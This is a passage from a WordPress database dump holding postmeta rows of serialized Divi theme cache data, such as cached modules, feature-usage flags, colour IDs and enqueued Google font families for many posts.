;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32228,26,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:7:{i:0;s:13:\"et_pb_section\";i:1;s:9:\"et_pb_row\";i:2;s:12:\"et_pb_column\";i:3;s:12:\"et_pb_button\";i:4;s:19:\"et_pb_contact_field\";i:5;s:18:\"et_pb_contact_form\";i:6;s:10:\"et_pb_text\";}}'),(32229,26,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32230,26,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:20:\"block_layout_enabled\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:25:\"media_embedded_in_content\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:7:{i:0;s:41:\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\";i:1;s:41:\"gcid-7ab3d862-4d0b-45ee-8ae5-ad938d511761\";i:2;s:18:\"gcid-primary-color\";i:3;s:20:\"gcid-secondary-color\";i:4;s:18:\"gcid-heading-color\";i:5;s:15:\"gcid-body-color\";i:6;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32223,893,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32224,1562,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32225,1562,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32226,1562,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32219,986,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32220,893,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32221,893,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32222,893,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32215,1681,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32216,986,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32217,986,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32218,986,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32211,1607,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32212,1681,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32213,1681,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32214,1681,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32198,602,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32199,602,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32200,1511,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32201,1511,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32202,1511,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32203,1511,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32204,785,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32205,785,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32206,785,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32207,785,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32208,1607,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32209,1607,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32210,1607,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32191,1223,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32192,1682,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32193,1682,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32194,1682,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32195,1682,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32196,602,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32197,602,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32187,1112,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32188,1223,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32189,1223,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32190,1223,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32183,669,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32184,1112,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32185,1112,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32186,1112,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32180,669,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32181,669,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32182,669,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32176,1591,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32177,1591,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32178,1591,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gci